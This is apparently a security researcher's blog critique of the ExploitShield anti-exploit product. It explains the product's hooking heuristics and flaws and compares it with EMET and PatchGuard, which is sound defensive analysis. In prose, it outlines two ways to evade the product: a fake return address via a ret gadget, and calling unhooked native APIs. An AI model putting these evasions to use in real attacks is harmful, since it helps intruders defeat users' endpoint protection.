Ending the Love Affair with ExploitShield

ExploitShield has been marketed as offering protection “against all known and unknown 0-day day vulnerability exploits, protecting users where traditional anti-virus and security products fail.” I found this assertion quite extraordinary and exciting! Vulnerabilities in software applications are real problems for computer users worldwide. So far, we have been pretty bad at providing actual technology to help individual users defend against vulnerabilities in software.

In my opinion, Microsoft has made the best advances with their Enhanced Mitigation Experience Toolkit. EMET changes the behavior of the operating system to increase the effort attackers have to expend to produce working exploits. There are blog posts that document exactly what EMET does.

In general, I believe that systems that are upfront and public about their methodologies are more trustworthy than “secret sauce” systems. EMET is very upfront about their methodologies, while ExploitShield conceals them in an attempt to derive additional security from obscurity.

I analyzed the ExploitShield system and technology and the results of my analysis follow. To summarize, the system is very predictable, attackers can easily study it and adapt their attacks to overcome it and the implementation itself creates new attack surface. After this analysis, I do not believe that this system would help an individual or organization defend themselves against an attacker with any capability to write their own exploits, 0-day or otherwise.

Caveat

The analysis I performed was on their “Browser” edition. It’s possible that something far more advanced is in their “Corporate” edition, I honestly can’t say because I haven’t seen it. However, given the ‘tone’ of the implementation that I analyzed, and the implementation flaws that are in it, I doubt this possibility and believe that the “Corporate” edition represents just “more of the same.” I am welcome to being proven wrong.

Initial Analysis

Usually we can use some excellent and free tools to get a sense of software’s footprint. I like to use GMER for this. GMER surveys the entire system and uses a cross-view technique to identify patches made to running programs.

If you recall, from ExploitShields marketing information, we see popup boxes that look like this:

This screenshot has some tells in it, for example, why is the path specified? If this was really blocking the ‘exploit’, shouldn’t it never get as far as specifying a path on the file system?

In the following sections, I’ll go over each phase of my analysis as it relates to a component of or a concept within ExploitShield.

ExploitShield uses a Device Driver

One component of the ExploitShield system is a device driver. The device driver uses an operating-system supported mechanism (PsSetCreateProcessNotifyRoutine) to receive notification from the operating system when a process is started by the operating system.

Each time a process starts, the device driver examines this process and optionally loads its own user-mode code module into the starting process. The criteria for loading a user-mode code module is determined by whether or not the starting process is a process that ExploitShield is protecting.

User-Mode Component

The user-mode component seems to exist only to hook/detour specific functions.

The act of function hooking, also called function detouring, involves making modifications to the beginning of a function such that when that function is invoked, another function is invoked instead. The paper on Detours by MS Research explains the concept pretty thoroughly.

Function hooking is commonly used as a way to implement a checker or reference monitor for an application. A security system can detour a function, such as CreateProcessA, and make a heuristics-based decision on the arguments to CreateProcessA. If the heuristic indicates that the behavior is suspect, the security system can take some action, such as failing the call to CreateProcessA or terminating the process.

Hooked Functions

ExploitShield seems to function largely by detouring the following methods:

WinExec
CreateProcessW/A
CreateFileW/A
* ShellExecute
* UrlDownloadToFileW/A
* UrlDownloadToCacheFileW/A

Here we can get a sense of what the authors of ExploitShield meant when they said “After researching thousands of vulnerability exploits ZeroVulnerabilityLabs has developed an innovative patent-pending technology that is able to detect if a shielded application is being exploited maliciously”. These are functions commonly used by shellcode to drop and execute some other program!

Function Hook Behavior

Each function implements a straightforward heuristic. Before any procedure (on x86) is invoked, the address to return to after the procedure is finished is pushed onto the stack. Each hook retrieves the return address off of the stack, and asks questions about the attributes of the return address.

  • Are the page permissions of the address RX (read-execute)?
  • Is the address located within the bounds of a loaded module?

If either of these two tests fail, ExploitShield reports that it has discovered an exploit!

A Confusion of Terms

  • Vulnerability: A vulnerability is a property of a piece of software that allows for some kind of trust violation. Vulnerabilities have a really broad definition. Memory corruption vulnerabilities have had such an impact on computer security that many times, ‘vulnerability’ is used simply as a shorthand for ‘memory corruption vulnerability’ however other kinds of vulnerabilities do exist, for example information disclosure vulnerabilities or authentication bypass vulnerabilities. An information disclosure vulnerability could sometimes be worse for individual privacy than a memory corruption vulnerability.
  • Exploit: An exploit is a software or procedure that uses a vulnerability to effect some action, usually to execute a payload.
  • Payload: Attacker created software that executes after a vulnerability has been used to compromise a system.

It is my belief that when ExploitShield uses the term ‘exploit’, they really mean ‘payload’.

A Good Day for ExploitShield

So what is a play by play of ExploitShield functioning as expected? Let’s take a look, abstracting the details of exactly which exploit is used:

  1. A user is fooled into navigating to a malicious web page under the attackers control. They can’t really be blamed too much for this, they just need to make this mistake once and the visit could be the result of an attacker compromising a legitimate website and using it to serve malware.
  2. This web page contains an exploit for a vulnerability in the user’s browser. The web browser loads the document that contains the exploit and begins to parse and process the exploit document.
  3. The data in the exploit document has been modified such that the program parsing the document does something bad. Let’s say that what the exploit convinces the web browser to do is to overwrite a function pointer stored somewhere in memory with a value that is the address of data that is also supplied by the exploit. Next, the vulnerable program calls this function pointer.
  4. Now, the web browser executes code supplied by the exploit. At this point, the web browser has been exploited. The user is running code supplied by the attacker / exploit. At this point, anything could happen. Note how we’ve made it all the way through the ‘exploitation’ stage of this process and ExploitShield hasn’t entered the picture yet.
  5. The executed code calls one of the hooked functions, say WinExec. For this example, let’s say that the code executing is called from a page that is on the heap, so its permissions are RWX (read-write-execute).

ExploitShield is great if the attacker doesn’t know it’s there, and, isn’t globally represented enough to be a problem in the large for an attacker. If the attacker knows it’s there, and cares, they can bypass it trivially.

A Bad Day for ExploitShield

If an attacker knows about ExploitShield, how much effort does it take to create an exploit that does not set off the alarms monitored by ExploitShield? I argue it does not take much effort at all. Two immediate possibilities come to mind:

  • Use a (very) primitive form of ROP (Return-Oriented Programming). Identify a ret instruction in a loaded module and push that onto the stack as a return address. Push your return address onto the stack before this address. The checks made by ExploitShield will pass.
  • Use a function that is equivalent to one of the hooked functions, but is not the hooked function. If CreateProcess is hooked, use NtCreateProcess instead.

Both of these would defeat the protections I discovered in ExploitShield. Additionally, these techniques would function on systems where ExploitShield is absent, meaning that if an attacker cared to bypass ExploitShield when it was present they would only need to do the work of implementing these bypasses once.

Obscurity Isn’t Always Bad

The principle of ‘security through obscurity’ is often cited by security nerds as a negative property for a security system to hold. However, obscurity does actually make systems more secure as long as the defensive system remains obscure or unpredictable. The difficulty for obscurity-based defensive techniques lies in finding an obscure change that can be made with little cost and that the attacker can’t adapt to before they are disrupted by it, or a change that can be altered for very little cost when its obscurity is compromised.

For example, consider PatchGuard from Microsoft. PatchGuard ‘protects’ the system by crashing when modifications are detected. The operation of PatchGuard is concealed and not published by Microsoft. As long as PatchGuards operation is obscured and secret, it can protect systems by crashing them when it detects modification made by a rootkit.

However, PatchGuard has been frequently reverse engineered and studied by security researchers. Each time a researcher has sat down with the intent to bypass PatchGuard, they have met with success. The interesting thing is what happens next: at some point in the future, Microsoft silently releases an update that changes the behavior of PatchGuard such that it still accomplishes its goal of crashing the system if modifications are detected, but is not vulnerable to attacks created by security researchers.

In this instance, obscurity works. It’s very cheap for Microsoft to make a new PatchGuard, indeed the kernel team might have ten of them “on the bench” waiting for the currently fielded version to be dissected and bypassed. This changes the kernel from a static target into a moving target. The obscurity works because it is at Microsoft’s initiative to change the mechanism, changes are both cheap and effective, and the attacker can’t easily prepare to avoid these changes when they’re made.

The changes that ExploitShield introduces are extremely brittle and cannot be modified as readily. Perhaps if ExploitShield was an engine to quickly deliver a broad variety of runtime changes and randomly vary them per application, this dynamic would be different.

Some Implementation Problems

Implementing a HIPS correctly is a lot of work! There are fiddly engineering decisions to make everywhere and as the author you are interposing yourself into a very sticky security situation. ExploitShield makes some unnecessary implementation decisions.

The IOCTL Interface

The driver exposes an interface that is accessible to all users. Traditional best-practices for legacy Windows drivers ask that interfaces to the driver only be accessible to the users that should access it. The ExploitShield interface is accessible to the entire system however, including unprivileged users.

The driver processes messages that are sent to it. I didn’t fully discover what type of messages these are, or their format, however IOCTL handling code is full of possibilities for subtle mistakes. Any mistake present inside of the IOCTL handling code could lead to a kernel-level vulnerability, which would compromise the security of your entire system.

This interface creates additional attack surface.

The Hook Logic

Each hook invokes a routine to check if the return address is located in a loaded module. This routine makes use of a global list of modules that is populated only once by a call to EnumerateLoadedModules with a programmer-supplied callback. There are two bugs in ExploitShields methodology to retrieve the list of loaded modules.

The first bug is that there is apparently no mutual exclusion around the critical section of populating the global list. Multiple threads can call CreateProcessA at once, so it is theoretically possible for the user-mode logic to place itself into an inconsistent state.

The second bug is that the modules are only enumerated once. Once EnumerateLoadedModules has been invoked, a global flag is set to true and then EnumerateLoadedModules is never invoked again. If the system observes a call to CreateProcess, and then a new module is subsequently loaded, and that module has a call to CreateProcess, the security system will erroneously flag that module as an attempted exploit.

Neither of these flaws expose the user to any additional danger, they just indicate poor programming practice.

Why Hook At All?

An especially baffling decision made in the implementation of ExploitShield is the use of hooks at all! For each event that ExploitShield concerns itself with (process creation and file write), there are robust callback infrastructures present in the NT kernel. Indeed, authors of traditional anti-virus software so frequently reduced system stability with overly zealous use of hooks that Microsoft very strongly encouraged them to use this in-kernel monitoring API.

ExploitShield uses unnecessarily dangerous programming practices to achieve effects possible by using legitimate system services, possibly betraying a lack of understanding of the platform they aim to protect.

The Impossibility of ExploitShield’s success

What can ExploitShield do to change this dynamic? The problem is, not much. Defensive systems like this are wholly dependent on obscurity. Once studied by attackers, the systems lose their value. In the case of software like this, one problem is that the feedback loop does not inform the authors or users of the security software that the attacker has adapted to the security system. Another problem is that the obscurity of a system is difficult to maintain. The software has to be used by customers, so it has to be available in some sense, and if it is available for customers, it will most likely also be available for study by an attacker.

What Hope Do We Have?

It’s important to note that EMET differs from ExploitShield in an important regard: EMET aims to disrupt the act of exploiting a program, while ExploitShield aims to disrupt the act of executing a payload on a system. These might seem like fine points, however a distinction can be made around “how many choices does the attacker have that are effective”. When it comes to executing payloads, the attackers choices are nearly infinite since they are already executing arbitrary code.

In this regard, EMET is generally not based on obscurity. The authors of EMET are very willing to discuss in great detail the different mitigation strategies they implement, while the author of ExploitShield has yet to do so.

Generally, I believe if a defensive technique makes a deterministic change to program or run-time behavior, an attack will fail until it is adapted to this technique. The effectiveness of the attack relies on the obscurity of the technique, and on whether the change impacts the vulnerability, exploit, or payload. If the attack cannot be adapted to the modified environment, then the obscurity of the mitigation is irrelevant.

However, what if the technique was not obscure, but was instead unpredictable? What if there was a defensive technique that would randomly adjust system implementation behavior while preserving the semantic behavior of the system as experienced by the program? What is needed is identification of properties of a system that, if changed, would affect the functioning of attacks but would not change the functioning of programs.

When these properties are varied randomly, the attacker has fewer options. Perhaps they are aware of a vulnerability that can transcend any permutation of implementation details. If they are not, however, they are entirely at the mercy of chance for whether or not their attack will succeed.

Conclusion

ExploitShield is a time capsule containing the best host-based security technology that 2004 had to offer. In my opinion, it doesn’t represent a meaningful change in the computer security landscape. The techniques used hinge wholly on obscurity and secrecy, require very little work to overcome and only affect the later stage of computer attacks, the payload, and not the exploit.

When compared to other defensive technologies, ExploitShield comes up short. It uses poorly implemented techniques that work against phases of the attack that require very little attacker adaptation to overcome. Once ExploitShield gains enough market traction, malware authors and exploit writers will automate techniques that work around it.

ExploitShield even increases your attack surface, by installing a kernel-mode driver that will processes messages sent by any user on the system. Any flaws in that kernel-mode driver could result in the introduction of a privilege escalation bug into your system.

The detection logic it uses to find shellcode is not wholly flawed, it contains an implementation error that could result in some false positives, however it is generally the case that a call to a runtime library function, with a return address that is not in the bounds of a loaded module, is suspicious. The problem with this detection signature is that it is trivially modified to achieve the same effect. Additionally, this detection signature is not novel, HIPS products have implemented this check for a long time.

This is a shame, because, in my opinion, there is still some serious room for innovation in this type of software…